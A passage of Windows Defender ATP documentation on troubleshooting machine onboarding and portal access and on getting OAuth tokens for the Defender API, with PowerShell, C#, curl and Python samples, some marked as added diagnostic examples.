<Key Path="SOFTWARE\Policies\Microsoft\Windows Defender"><KeyValue Value="0" ValueKind="DWord" Name="DisableAntiVirus"/></Key>

After clearing the policy, run the onboarding steps again.


You can also check the following registry key values to verify that the policy is not set:
1. Open the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender.
2. Ensure that the value DisableAntiSpyware is not present.
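The local checks from the onboarding-script event table (SENSE service state and the onboarding status value under HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status), the diagnostic data service steps (diagtrack start type and state) and the Windows Defender policy check just above are all registry and service reads, so they fit in one script. The following is an added example, not from the original page: it reports every failed check with the page's remediation, and -Fix applies only the remediation the page itself prescribes (set diagtrack to automatic start and start it); policy values are reported but not removed, because they come from Group Policy or MDM and would be re-applied. Assumptions: the onboarding status value is named OnboardingState, matching the OMA-URI of the same name; SENSE is expected to have an automatic start type once onboarded (the page says it is manual only after offboarding). Run elevated.

```powershell
# Added example (not from the original page): local onboarding prerequisites check.
[CmdletBinding()]
param([switch]$Fix)

$findings = New-Object System.Collections.Generic.List[string]

function Test-ServiceState {
    param([string]$Name, [string]$ExpectedStartMode, [switch]$FixAllowed)
    $svc = Get-CimInstance Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { $findings.Add("$Name service is not installed"); return }
    # Win32_Service.StartMode is 'Auto', 'Manual' or 'Disabled' ('Auto' covers delayed start too)
    if ($svc.StartMode -ne $ExpectedStartMode) {
        $findings.Add("$Name start type is $($svc.StartMode), expected $ExpectedStartMode")
        if ($Fix -and $FixAllowed) { Set-Service -Name $Name -StartupType Automatic }
    }
    if ($svc.State -like '*Pending*') {
        # The intermediate state the script event 15 row describes; the script should be retried, not forced
        $findings.Add("$Name is in intermediate state '$($svc.State)'; wait and re-run the script, or reboot")
    } elseif ($svc.State -ne 'Running') {
        $findings.Add("$Name is $($svc.State)")
        if ($Fix -and $FixAllowed) { Start-Service -Name $Name }
    }
}

# Connected User Experiences and Telemetry: must be automatic and running (sc qc diagtrack / sc config)
Test-ServiceState -Name 'diagtrack' -ExpectedStartMode 'Auto' -FixAllowed
# SENSE: automatic once onboarded. Not auto-fixed: a wrong start type here means onboarding itself failed.
Test-ServiceState -Name 'sense' -ExpectedStartMode 'Auto'

# Onboarding status written by SENSE on first start (script events 35 and 40 expect it to be 1)
$statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
$state = (Get-ItemProperty -Path $statusKey -Name OnboardingState -ErrorAction SilentlyContinue).OnboardingState
if ($null -eq $state) { $findings.Add("$statusKey\OnboardingState is missing (script event 35)") }
elseif ($state -ne 1) { $findings.Add("OnboardingState is $state, expected 1 (script event 40); check the SENSE log") }

# Policy key the onboarding script/CSP writes to (script events 5 and 10, Intune 0x87D1FDE8)
$wdatpPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
if (-not (Test-Path $wdatpPolicy)) { $findings.Add("$wdatpPolicy does not exist; onboarding data was never written") }

# Windows Defender policies that disable the ELAM driver SENSE depends on (system error 577)
$defPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
foreach ($name in 'DisableAntiSpyware', 'DisableAntiVirus') {
    $val = (Get-ItemProperty -Path $defPolicy -Name $name -ErrorAction SilentlyContinue).$name
    if ($null -ne $val) {
        $findings.Add("$defPolicy\$name is present (value $val); clear the policy, then run onboarding again")
    }
}

if ($findings.Count -eq 0) { 'All local checks passed; run the connectivity analyzer next.' }
else { $findings | ForEach-Object { "FAIL: $_" } }
```

If every local check passes but the machine still does not appear in the Machines list after an hour, the remaining cause is connectivity, which the Verify client connectivity section covers.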

Troubleshoot onboarding issues on a server

If you encounter issues while onboarding a server, go through the following verification steps to address possible issues.
Ensure Microsoft Monitoring Agent (MMA) is installed and configured to report sensor data to the service
Ensure that the server proxy and Internet connectivity settings are configured properly
You might also need to check the following:
Check that there is a Windows Defender Advanced Threat Protection Service running in the Processes tab in Task Manager.
Check Event Viewer > Applications and Services Logs > Operations Manager to see if there are any errors.
In Services, check if the Microsoft Monitoring Agent is running on the server.
In Microsoft Monitoring Agent > Azure Log Analytics (OMS), check the Workspaces and verify that the status is running.
Check to see that machines are reflected in the Machines list in the portal.

Licensing requirements
Windows Defender Advanced Threat Protection requires one of the following Microsoft Volume Licensing offers:
Windows 10 Enterprise E5
Windows 10 Education E5
Microsoft 365 Enterprise E5 which includes Windows 10 Enterprise E5
For more information, see Windows 10 Licensing.

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Troubleshoot Windows Defender ATP
Onboard machines
Configure machine proxy and Internet connectivity settings
Troubleshoot subscription and portal access issues
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

This page provides detailed steps to troubleshoot issues that might occur when setting up your Windows Defender
ATP service.
If you receive an error message, Windows Defender Security Center will provide a detailed explanation on what
the issue is and relevant links will be supplied.

No subscriptions found
If while accessing Windows Defender Security Center you get a No subscriptions found message, it means the
Azure Active Directory (AAD) tenant used to sign the user in to the portal does not have a Windows Defender ATP license.
Potential reasons:
The Windows E5 and Office E5 licenses are separate licenses.
The license was purchased but not provisioned to this AAD instance.
It could be a license provisioning issue.
It could be you inadvertently provisioned the license to a different Microsoft AAD than the one used for
authentication into the service.
For both cases you should contact Microsoft support at General Windows Defender ATP Support or Volume
license support.

Your subscription has expired


If while accessing Windows Defender Security Center you get a Your subscription has expired message, your
online service subscription has expired. Windows Defender ATP subscription, like any other online service
subscription, has an expiration date.
You can choose to renew or extend the license at any point in time. When accessing the portal after the expiration
date a Your subscription has expired message will be presented with an option to download the machine
offboarding package, should you choose to not renew the license.

NOTE
For security reasons, the package used to offboard machines expires 30 days after the date it was downloaded. Expired
offboarding packages sent to a machine will be rejected. When downloading an offboarding package you will be notified of
the package's expiry date, and it is also included in the package name.

You are not authorized to access the portal


If you receive a You are not authorized to access the portal message, be aware that Windows Defender ATP is a security
monitoring, incident investigation and response product, and as such, access to it is restricted and must be granted
explicitly. For more information, see Assign user access to the portal.

Data currently isn't available on some sections of the portal


If the portal dashboard and other sections show an error message such as "Data currently isn't available", you'll
need to whitelist securitycenter.windows.com and all sub-domains under it, for example *.securitycenter.windows.com.

Portal communication issues


If you encounter issues with accessing the portal, missing data, or restricted access to portions of the portal, you'll
need to verify that the following URLs are whitelisted and open for communication.
*.blob.core.windows.net
crl.microsoft.com
https://*.microsoftonline-p.com
https://*.securitycenter.windows.com
https://automatediracs-eus-prd.securitycenter.windows.com
https://login.microsoftonline.com
https://login.windows.net
https://onboardingpackagescusprd.blob.core.windows.net
https://secure.aadcdn.microsoftonline-p.com
https://securitycenter.windows.com
https://static2.sharepointonline.com

Related topics
Validate licensing provisioning and complete setup for Windows Defender ATP
Windows Defender ATP APIs
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

In this section
TOPIC DESCRIPTION

Windows Defender ATP API overview Learn how to access the Windows Defender ATP Public API and in which
context (application or user).

Supported Windows Defender ATP APIs Learn more about the individual supported entities where you
can run API calls to and details such as HTTP request values,
request headers and expected responses. Examples include
APIs for alert resource type, domain related alerts, or even
actions such as isolate machine.

How to use APIs - Samples Learn how to use Advanced hunting APIs and multiple APIs
such as PowerShell. Other examples include schedule
advanced hunting using Microsoft Flow or OData queries.
Windows Defender ATP API overview
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those
APIs will enable you to automate workflows and innovate based on Windows Defender ATP capabilities.
The API access requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization
Code Flow.
In general, you’ll need to take the following steps to use the APIs:
Create an AAD application
Get an access token using this application
Use the token to access Windows Defender ATP API
You can access the Windows Defender ATP API with Application Context or User Context.
Application Context: (Recommended)
Used by apps that run without a signed-in user present, for example, apps that run as background services or daemons.
Steps that need to be taken to access the Windows Defender ATP API with application context:
1. Create an AAD Web-Application.
2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
3. Create a key for this Application.
4. Get a token using the application with its key.
5. Use the token to access the Windows Defender ATP API.
Because an application-context token carries every permission granted to the app, regardless of who runs the
script, treat the application key like a password and grant only the permissions the workflow needs.
For more information, see Get access with application context.
User Context:
Used to perform actions in the API on behalf of a user.
Steps that need to be taken to access the Windows Defender ATP API with user context:
1. Create an AAD Native-Application.
2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
3. Get a token using the application with user credentials.
4. Use the token to access the Windows Defender ATP API.
For more information, see Get access with user context.

Related topics
Windows Defender ATP APIs
Access Windows Defender ATP with application context
Access Windows Defender ATP with user context
Windows Defender ATP API - Hello World
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Get Alerts using a simple PowerShell script


How long does it take to go through this example?
It only takes 5 minutes, done in two steps:
Application registration
Use examples: only requires copy/paste of a short PowerShell script
Do I need permission to connect?
For the App registration stage, you must have a Global administrator role in your Azure Active Directory (Azure
AD) tenant.
Step 1 - Create an App in Azure Active Directory
1. Log on to Azure with your Global administrator user.
2. Navigate to Azure Active Directory > App registrations > New application registration.

3. In the registration form, enter the following information, then click Create.
Name: Choose your own name.
Application type: Web app / API
Redirect URI: https://127.0.0.1
4. Allow your App to access Windows Defender ATP and assign it 'Read all alerts' permission:
Click Settings > Required permissions > Add.

Click Select an API > WindowsDefenderATP, then click Select.


Note: WindowsDefenderATP does not appear in the original list. You need to start writing its name in
the text box to see it appear.

Click Select permissions > Read all alerts > Select.


Click Done

Click Grant permissions


Note: Every time you add permission you must click on Grant permissions.
5. Create a key for your App:
Click Keys, type a key name and click Save.

6. Write down your App ID and your Tenant ID:
App ID: copy it from the application's registration page.
Tenant ID: Navigate to Azure Active Directory > Properties
Done! You have successfully registered an application!
Step 2 - Get a token using the App and use this token to access the API.
Copy the script below to PowerShell ISE or to a text editor, and save it as "Get-Token.ps1".
Running this script will generate a token and save it in the working folder under the name "Latest-token.txt".

# This script gets an app-context token and saves it to a file named "Latest-token.txt" in the current
# directory.
# Paste your Tenant ID, App ID and App Secret (App key) below.

$tenantId = ''   ### Paste your tenant ID here
$appId = ''      ### Paste your app ID here
$appSecret = ''  ### Paste your app key here

$resourceAppIdUri = 'https://api.securitycenter.windows.com'
$oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
$authBody = [Ordered] @{
    resource = "$resourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'   # application context: no signed-in user
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$token = $authResponse.access_token
# The saved token is a bearer credential for everything the app was granted; protect the file.
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token

Sanity Check:
Run the script.
In your browser go to: https://jwt.ms/
Copy the token (the content of the Latest-token.txt file).
Paste in the top box.
Look for the "roles" section. Find the Alert.Read.All role.
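The jwt.ms check pastes a live bearer token into a web page. The same check can be done locally, which also lets a script refuse to call the API with a token that is expired, issued for the wrong audience or missing the role it needs. The following is an added example, not from the original page: it base64url-decodes the JWT payload (no signature verification; the API does that) and inspects the aud, exp and roles claims. The sample token at the bottom is constructed from a hand-written payload so the script runs offline; the tenant and app IDs in it are placeholders.

```powershell
# Added example (not from the original page): local sanity check of an app-context token.

function ConvertFrom-Base64Url {
    param([string]$Text)
    $s = $Text.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) { 2 { $s += '==' } 3 { $s += '=' } }   # restore stripped padding
    return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))
}

function ConvertTo-Base64Url {
    param([string]$Text)
    return [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Text)).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

function Test-WdatpToken {
    param(
        [Parameter(Mandatory)][string]$Token,
        [string[]]$RequiredRoles = @('Alert.Read.All'),
        [string]$ExpectedAudience = 'https://api.securitycenter.windows.com'
    )
    $parts = $Token.Trim().Split('.')
    if ($parts.Count -ne 3) { throw 'Not a JWT (expected header.payload.signature)' }
    $claims = ConvertFrom-Base64Url $parts[1] | ConvertFrom-Json

    $problems = @()
    if ($claims.aud -ne $ExpectedAudience) { $problems += "aud is '$($claims.aud)', expected '$ExpectedAudience'" }
    $expires = [DateTimeOffset]::FromUnixTimeSeconds([int64]$claims.exp)
    if ($expires -lt [DateTimeOffset]::UtcNow) { $problems += "token expired at $expires; run Get-Token.ps1 again" }
    # App-context tokens carry granted application permissions in the "roles" claim
    $roles = @($claims.roles)
    foreach ($r in $RequiredRoles) {
        if ($roles -notcontains $r) { $problems += "missing role $r (add it under Required permissions and click Grant permissions)" }
    }
    [pscustomobject]@{
        AppId = $claims.appid; Tenant = $claims.tid; Roles = $roles
        Expires = $expires; Problems = $problems; Ok = ($problems.Count -eq 0)
    }
}

# Constructed sample: an app-context-shaped payload wrapped in an unsigned JWT (placeholder IDs).
$header  = ConvertTo-Base64Url '{"typ":"JWT","alg":"none"}'
$payload = ConvertTo-Base64Url (@{
    aud   = 'https://api.securitycenter.windows.com'
    tid   = '00000000-0000-0000-0000-000000000000'
    appid = '11111111-1111-1111-1111-111111111111'
    roles = @('Alert.Read.All')
    exp   = [DateTimeOffset]::UtcNow.AddHours(1).ToUnixTimeSeconds()
} | ConvertTo-Json -Compress)
$sampleToken = '{0}.{1}.' -f $header, $payload

Test-WdatpToken -Token $sampleToken
# Real token: Test-WdatpToken -Token (Get-Content .\Latest-token.txt -Raw)
```

Calling Test-WdatpToken before the alerts request below turns an opaque 401 or 403 from the API into a concrete message about which claim is wrong.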
Let's get the Alerts!
The script below will use Get-Token.ps1 to access the API and will get the Alerts from the past 48 hours.
Save this script in the same folder you saved the previous script Get-Token.ps1.
The script creates two files (json and csv) with the data in the same folder as the scripts.

# Returns Alerts created in the past 48 hours.

$token = ./Get-Token.ps1   # runs Get-Token.ps1 - make sure you run this script from the same folder as Get-Token.ps1

# Get Alerts from the last 48 hours. Make sure you have alerts in that time frame.
$dateTime = (Get-Date).ToUniversalTime().AddHours(-48).ToString("o")

# The URL contains the type of query and the time filter we created above
# Read more about other query options and filters at Https://TBD- add the documentation link
$url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime"

# Set the WebRequest headers
$headers = @{
    'Content-Type' = 'application/json'
    Accept = 'application/json'
    Authorization = "Bearer $token"
}

# Send the web request and get the results.
$response = Invoke-WebRequest -Method Get -Uri $url -Headers $headers -UseBasicParsing -ErrorAction Stop

# Extract the alerts from the response body. -Depth keeps nested alert properties instead of truncating
# them at ConvertTo-Json's default depth of 2.
$alerts = ($response.Content | ConvertFrom-Json).value | ConvertTo-Json -Depth 10

# Get a string with the execution time. We append it to the output file name to avoid overwriting the file.
$dateTimeForFileName = Get-Date -Format o | foreach {$_ -replace ":", "."}

# Save the result as json and as csv
$outputJsonPath = "./Latest Alerts $dateTimeForFileName.json"
$outputCsvPath = "./Latest Alerts $dateTimeForFileName.csv"

Out-File -FilePath $outputJsonPath -InputObject $alerts
($alerts | ConvertFrom-Json) | Export-CSV $outputCsvPath -NoTypeInformation

You're all done! You have just successfully:
Created and registered an application
Granted permission for that application to read alerts
Connected to the API
Used a PowerShell script to return alerts created in the past 48 hours

Related topic
Windows Defender ATP APIs
Access Windows Defender ATP with application context
Access Windows Defender ATP with user context
Create an app to access Windows Defender ATP
without a user
4/22/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

This page describes how to create an application to get programmatic access to Windows Defender ATP without
a user.
If you need programmatic access to Windows Defender ATP on behalf of a user, see Get access with user context.
If you are not sure which access you need, see Get started.
Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those APIs
will help you automate workflows and innovate based on Windows Defender ATP capabilities. The API access
requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
In general, you’ll need to take the following steps to use the APIs:
Create an AAD application
Get an access token using this application
Use the token to access Windows Defender ATP API
This page explains how to create an AAD application, get an access token to Windows Defender ATP and validate
the token.

Create an app
1. Log on to Azure with a user that has the Global Administrator role.
2. Navigate to Azure Active Directory > App registrations > New application registration.
3. In the Create window, enter the following information, then click Create.
Name: Choose your own name.
Application type: Web app / API
Redirect URI: https://127.0.0.1
4. Click Settings > Required permissions > Add.
5. Click Select an API > WindowsDefenderATP, then click Select.
Note: WindowsDefenderATP does not appear in the initial list. You need to start typing its name in the text box to see it appear.

6. Click Select permissions > Check the desired permissions > Select.
Important note: You need to select the relevant permissions. 'Run advanced queries' is only an example!
For instance,
To run advanced queries, select the 'Run advanced queries' permission
To isolate a machine, select the 'Isolate machine' permission
To determine which permission you need, look at the Permissions section of the API you intend to call.
7. Click Done

8. Click Grant permissions
In order to add the newly selected permissions to the app, the tenant's admin must press the Grant permissions button.
If in the future you want to add more permissions to the app, you will need to press the Grant permissions button again for the changes to take effect.
9. Click Keys, type a key name and click Save.
Important: After you save, copy the key value. You won't be able to retrieve it after you leave!

10. Write down your application ID.
11. For Windows Defender ATP Partners only - Set your application to be multi-tenanted
This is required for 3rd party apps (for example, if you create an application that is intended to run in multiple customers' tenants).
This is not required if you create a service that you want to run in your tenant only (for example, if you create an application for your own usage that will only interact with your own data).
Click Properties > Yes > Save.
Application consent for your multi-tenant App:
You need your application to be approved in each tenant where you intend to use it. This is because your application interacts with the Windows Defender ATP application on behalf of your customer.
You (or your customer if you are writing a 3rd party application) need to click the consent link and approve your application. The consent should be done with a user who has admin privileges in the Active Directory.
The consent link is of the form:

https://login.microsoftonline.com/common/oauth2/authorize?prompt=consent&client_id=00000000-0000-0000-0000-000000000000&response_type=code&sso_reload=true

where 00000000-0000-0000-0000-000000000000 should be replaced with your Azure application ID


Done! You have successfully registered an application!
See examples below for token acquisition and validation.

Examples of getting an access token:
For more details on AAD tokens, refer to the AAD tutorial

Using PowerShell
# This code gets the App Context Token and saves it to a file named "Latest-token.txt" under the current directory
# Paste below your Tenant ID, App ID and App Secret (App key).

$tenantId = '' ### Paste your tenant ID here
$appId = '' ### Paste your app ID here
$appSecret = '' ### Paste your app key here

$resourceAppIdUri = 'https://api.securitycenter.windows.com'
$oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
$authBody = [Ordered] @{
    resource = "$resourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$token = $authResponse.access_token
Out-File -FilePath "./Latest-token.txt" -InputObject $token
return $token

Using C#:
The code below was tested with the NuGet package Microsoft.IdentityModel.Clients.ActiveDirectory 3.19.8

Create a new Console Application
Install the NuGet package Microsoft.IdentityModel.Clients.ActiveDirectory
Add the below using

using Microsoft.IdentityModel.Clients.ActiveDirectory;

Copy/paste the code below into your application (do not forget to update the 3 variables: tenantId, appId, appSecret)

string tenantId = "00000000-0000-0000-0000-000000000000"; // Paste your own tenant ID here
string appId = "11111111-1111-1111-1111-111111111111"; // Paste your own app ID here
string appSecret = "22222222-2222-2222-2222-222222222222"; // Paste your own app secret here for a test, and then store it in a safe place!

const string authority = "https://login.windows.net";
const string wdatpResourceId = "https://api.securitycenter.windows.com";

AuthenticationContext auth = new AuthenticationContext($"{authority}/{tenantId}/");
ClientCredential clientCredential = new ClientCredential(appId, appSecret);
AuthenticationResult authenticationResult = auth.AcquireTokenAsync(wdatpResourceId, clientCredential).GetAwaiter().GetResult();
string token = authenticationResult.AccessToken;

Using Python
Refer to Get token using Python

Using Curl

NOTE
The procedure below assumes Curl for Windows is already installed on your computer

Open a command window
Set CLIENT_ID to your Azure application ID
Set CLIENT_SECRET to your Azure application secret
Set TENANT_ID to the Azure tenant ID of the customer that wants to use your application to access the Windows Defender ATP application
Run the command below (the -k switch disables TLS certificate verification; drop it unless you are deliberately testing against an untrusted certificate):

curl -i -X POST -H "Content-Type:application/x-www-form-urlencoded" -d "grant_type=client_credentials" -d "client_id=%CLIENT_ID%" -d "scope=https://securitycenter.onmicrosoft.com/windowsatpservice/.default" -d "client_secret=%CLIENT_SECRET%" "https://login.microsoftonline.com/%TENANT_ID%/oauth2/v2.0/token" -k

You will get an answer of the form:

{"token_type":"Bearer","expires_in":3599,"ext_expires_in":0,"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIn <truncated> aWReH7P0s0tjTBX8wGWqJUdDA"}

Validate the token
Sanity check to make sure you got a correct token:
Copy/paste the token you got in the previous step into JWT in order to decode it
Validate that you get a 'roles' claim with the desired permissions
In the screenshot below you can see a decoded token acquired from an app with permissions to all of Windows Defender ATP's roles:
Use the token to access Windows Defender ATP API
Choose the API you want to use; for more information, see Supported Windows Defender ATP APIs
Set the Authorization header in the HTTP request you send to "Bearer {token}" (Bearer is the Authorization scheme)
The expiration time of the token is 1 hour (you can send more than one request with the same token)
Example of sending a request to get a list of alerts using C#
var httpClient = new HttpClient();

var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.windows.com/api/alerts");

request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);

var response = httpClient.SendAsync(request).GetAwaiter().GetResult();

// Do something useful with the response

Related topics
Supported Windows Defender ATP APIs
Access Windows Defender ATP on behalf of a user
Use Windows Defender ATP APIs
4/22/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )


This page describes how to create an application to get programmatic access to Windows Defender ATP on behalf of a user.
If you need programmatic access to Windows Defender ATP without a user, refer to Access Windows Defender ATP with application context.
If you are not sure which access you need, read the Introduction page.
Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those APIs will enable you to automate workflows and innovate based on Windows Defender ATP capabilities. API access requires OAuth 2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
In general, you’ll need to take the following steps to use the APIs:
Create an AAD application
Get an access token using this application
Use the token to access the Windows Defender ATP API
This page explains how to create an AAD application, get an access token for Windows Defender ATP and validate the token.

NOTE
When accessing the Windows Defender ATP API on behalf of a user, you will need both the correct app permission and user permission. If you are not familiar with user permissions on Windows Defender ATP, see Manage portal access using role-based access control.

TIP
If you have the permission to perform an action in the portal, you have the permission to perform the action in the API.

Create an app
1. Log on to Azure with a user that has the Global Administrator role.
2. Navigate to Azure Active Directory > App registrations > New application registration.
3. In the Create window, enter the following information, then click Create.
Name: -Your app name-
Application type: Native
Redirect URI: https://127.0.0.1
4. Click Settings > Required permissions > Add.
5. Click Select an API > WindowsDefenderATP, then click Select.
Note: WindowsDefenderATP does not appear in the initial list. You need to start typing its name in the text box to see it appear.
6. Click Select permissions > Check the desired permissions > Select.

IMPORTANT
You need to select the relevant permissions. 'Read alerts' and 'Collect forensics' are only examples. For instance,
To run advanced queries, select the 'Run advanced queries' permission
To isolate a machine, select the 'Isolate machine' permission
To determine which permission you need, look at the Permissions section of the API you intend to call.

7. Click Done
8. Click Grant permissions
In order to add the newly selected permissions to the app, the tenant's admin must press the Grant permissions button.
If in the future you want to add more permissions to the app, you will need to press the Grant permissions button again for the changes to take effect.

9. Write down your application ID.

Get an access token
For more details on AAD tokens, refer to the AAD tutorial
Using C#
Copy/paste the class below into your application.
Use the AcquireUserTokenAsync method with your application ID, tenant ID, user name and password to acquire a token.

namespace WindowsDefenderATP
{
    using System;
    using System.Net.Http;
    using System.Text;
    using System.Threading.Tasks;
    using Newtonsoft.Json.Linq;

    public static class WindowsDefenderATPUtils
    {
        private const string Authority = "https://login.windows.net";

        private const string WdatpResourceId = "https://api.securitycenter.windows.com";

        public static async Task<string> AcquireUserTokenAsync(string username, string password, string appId, string tenantId)
        {
            using (var httpClient = new HttpClient())
            {
                // Form-encode each value: a password containing '&', '%' or '+' would otherwise corrupt the body.
                var urlEncodedBody = $"resource={Uri.EscapeDataString(WdatpResourceId)}&client_id={Uri.EscapeDataString(appId)}&grant_type=password&username={Uri.EscapeDataString(username)}&password={Uri.EscapeDataString(password)}";

                var stringContent = new StringContent(urlEncodedBody, Encoding.UTF8, "application/x-www-form-urlencoded");

                using (var response = await httpClient.PostAsync($"{Authority}/{tenantId}/oauth2/token", stringContent).ConfigureAwait(false))
                {
                    response.EnsureSuccessStatusCode();

                    var json = await response.Content.ReadAsStringAsync().ConfigureAwait(false);

                    var jObject = JObject.Parse(json);

                    return jObject["access_token"].Value<string>();
                }
            }
        }
    }
}

Validate the token
Sanity check to make sure you got a correct token:
Copy/paste the token you got in the previous step into JWT in order to decode it
Validate that you get a 'scp' claim with the desired app permissions
In the screenshot below you can see a decoded token acquired from the app in the tutorial:
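The sanity check described here and in the application-context "Validate the token" section above, as an added Python example that is not part of the original page: it base64url-decodes the token payload (what the JWT site does for you) and checks the 'roles' claim (app token) or 'scp' claim (user token), the audience and the expiry. It does not verify the signature, so it is a diagnostic aid only; the sample tokens are constructed.

```python
"""Offline sanity check of a Windows Defender ATP access token's claims.

This decodes the payload only; it does not verify the signature, so use it as a
diagnostic aid (the page's 'validate the token' step), never as an authorization
check. The sample tokens below are constructed, not real.
"""
import base64
import json
import time

WDATP_AUDIENCE = "https://api.securitycenter.windows.com"


def _b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_claims(token: str) -> dict:
    """Return the payload claims of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT: expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def granted_permissions(claims: dict) -> set:
    """Permissions in the token: 'roles' (array) for app tokens, 'scp' (space-separated) for user tokens."""
    if claims.get("roles"):
        return set(claims["roles"])
    if claims.get("scp"):
        return set(claims["scp"].split())
    return set()


def check_token(token: str, required: set, audience: str = WDATP_AUDIENCE, now=None) -> list:
    """Return a list of problems; an empty list means the token looks usable for `required`."""
    claims = decode_claims(token)
    problems = []
    if claims.get("aud") != audience:
        problems.append(f"audience is {claims.get('aud')!r}, expected {audience!r}")
    exp = claims.get("exp")
    now = time.time() if now is None else now
    if exp is None or exp <= now:
        problems.append("token is expired or has no 'exp' claim")
    missing = required - granted_permissions(claims)
    if missing:
        problems.append("missing permissions: " + ", ".join(sorted(missing)))
    return problems


def _constructed_token(claims: dict) -> str:
    """Build header.payload.<fake signature> for local testing (no real signing)."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'typ': 'JWT', 'alg': 'RS256'})}.{enc(claims)}.constructed-signature"


# Constructed samples mirroring the two flows on the page (far-future exp = 2100-01-01).
APP_TOKEN = _constructed_token({"aud": WDATP_AUDIENCE, "exp": 4102444800,
                                "roles": ["Alert.Read.All", "AdvancedQuery.Read.All"]})
USER_TOKEN = _constructed_token({"aud": WDATP_AUDIENCE, "exp": 4102444800,
                                 "scp": "Alert.Read AdvancedQuery.Read"})

if __name__ == "__main__":
    print(check_token(APP_TOKEN, {"Alert.Read.All"}))          # []
    print(check_token(APP_TOKEN, {"Alert.ReadWrite.All"}))     # missing permission
    print(check_token(USER_TOKEN, {"AdvancedQuery.Read"}))     # []
```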
Use the token to access Windows Defender ATP API
Choose the API you want to use - Supported Windows Defender ATP APIs
Set the Authorization header in the HTTP request you send to "Bearer {token}" (Bearer is the Authorization scheme)
The expiration time of the token is 1 hour (you can send more than one request with the same token)
Example of sending a request to get a list of alerts using C#

var httpClient = new HttpClient();

var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.windows.com/api/alerts");

request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);

var response = httpClient.SendAsync(request).GetAwaiter().GetResult();

// Do something useful with the response

Related topics
Windows Defender ATP APIs
Access Windows Defender ATP with application context
Supported Windows Defender ATP query APIs
4/8/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )


Endpoint URI and Versioning

Endpoint URI:
The service base URI is: https://api.securitycenter.windows.com
The OData-based queries have the '/api' prefix. For example, to get Alerts you can send a GET request to https://api.securitycenter.windows.com/api/alerts

Versioning:
The API supports versioning.
The current version is V1.0.
To use a specific version, use this format: https://api.securitycenter.windows.com/api/{Version}. For example: https://api.securitycenter.windows.com/api/v1.0/alerts
If you don't specify any version (e.g., https://api.securitycenter.windows.com/api/alerts) you will get the latest version.

Learn more about the individual supported entities where you can run API calls to and details such as HTTP
request values, request headers and expected responses.

In this section
TOPIC | DESCRIPTION
Advanced Hunting | Run queries from the API.
Alerts | Run API calls such as get alerts, alert information by ID, alert related actor information, alert related IP information, and alert related machine information.
Domain | Run API calls such as get domain related machines, domain statistics, and check if a domain is seen in your organization.
File | Run API calls such as get file information, file related alerts, file related machines, and file statistics.
IP | Run API calls such as get IP related alerts, IP related machines, IP statistics, and check if an IP is seen in your organization.
Machines | Run API calls such as find machine information by IP, get machines, get machines by ID, information about logged on users, and alerts related to a given machine ID.
User | Run API calls such as get alert related user information, user information, user related alerts, and user related machines.

Related topic
Windows Defender ATP APIs
Advanced hunting API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )
This API allows you to run programmatically the queries that you are used to running from the Windows Defender ATP Portal.

Limitations
1. You can only run a query on data from the last 30 days
2. The results will include a maximum of 10,000 rows
3. The number of executions is limited (up to 15 calls per minute, 15 minutes of running time every hour and 4 hours of running time a day)
4. The maximal execution time of a single request is 10 minutes.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Windows Defender ATP APIs

PERMISSION TYPE | PERMISSION | PERMISSION DISPLAY NAME
